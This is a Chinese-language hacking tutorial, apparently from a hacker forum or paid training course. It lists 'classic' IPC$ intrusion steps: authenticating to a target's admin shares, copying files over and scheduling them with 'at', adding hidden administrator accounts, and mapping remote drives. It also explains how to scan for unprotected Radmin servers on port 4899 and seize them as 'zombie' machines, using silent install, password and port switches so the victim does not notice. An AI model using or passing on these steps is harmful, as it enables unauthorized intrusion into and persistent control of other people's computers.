IPC$经典入侵步骤和常用net命令

 
ipc$经典入侵步骤：
1、net use [url=file://ip/ipc$]\\ip\ipc$[/url] 密码 /user:用户名
2、copy 文件名 [url=file://ip/c$]\\ip\c$[/url]
3、net  time [url=file://ip/]\\ip[/url]
4、at [url=file://ip/]\\ip[/url] 时间 命令
5、入侵成功，连接你的肉鸡
常用的网络命令
*net user 查看用户列表
*net user 用户名 密码 /add 添加用户
*net user 用户名 密码 更改用户密码
*net localgroup administrators 用户名 /add 添加用户到管理组
*net user 用户名 /delete 删除用户
*net user 用户名 查看用户的基本情况
*net user 用户名 /active:no 禁用该用户
*net user 用户名 /active:yes 启用该用户
*net share 查看计算机IPC$共享资源
*net share 共享名 查看该共享的情况
*net share 共享名=路径 设置共享。例如 net share c$=c:
*net share 共享名 /delete 删除IPC$共享
*net stop lanmanserver 关闭ipc$和默认共享依赖的服务
*net use 查看IPC$连接情况
*net use \\ip\ipc$ "密码" /user:"用户名" ipc$连接
*net use \\ip\ipc$ /del 删除一个连接
*net use z: \\目标IP\c$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘
*net use z: /del 
*net time \\ip 查看远程计算机上的时间
*copy 路径:\文件名 \\ip\共享名 复制文件到已经ipc$连接的计算机上
*net view ip 查看计算机上的共享资源
*at 查看自己计算机上的计划作业
*at \\ip 查看远程计算机上的计划作业
*at \\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业
*at \\ip 计划作业ID /delete 删除远程计算机上的一个计划作业
*at \\ip all /delete 删除远程计算机上的全部计划作业
*at \\ip time "echo 5 > c:\t.txt" 在远程计算机上建立文本文件t.txt；
 CMD下控制r_server的常用命令
   radmin本来是国外一家电脑公司编写的远程控制软件，由于它功能强大、且服务端图标可以隐藏，所以常被黑客技术爱好者当作木马广为传播使用。用4899探测器随便扫描一个IP段，就能扫描到很多没有密码、没有隐藏图标、端口默认为4899的radmin服务端。
   要想将这些扫描到的肉鸡据为己有，就得重新设置端口、隐藏图标、设置密码和设置自启动方式，这些都需要用到radmin的CMD命令。明天的会员课程，将向会员详细演示4899肉鸡的搜索、利用及改造，现将需要用到的一些CMD命令列出来，会员可事先预习预习：

基本命令格式  r_server.exe /命令
常用命令有：
/port:8923    设置运行端口为8923
/pass:1506414 设置连接密码为1506414
/save         将设置的密码或端口等写入注册表
/install      将r_server安装为服务方式（自启动）
/uninstall    将服务方式的r_server卸载掉
/silence      以安静模式运行上面的命令，避免跳出提示对
              话框让对方发觉
/？           显示radmin的命令帮助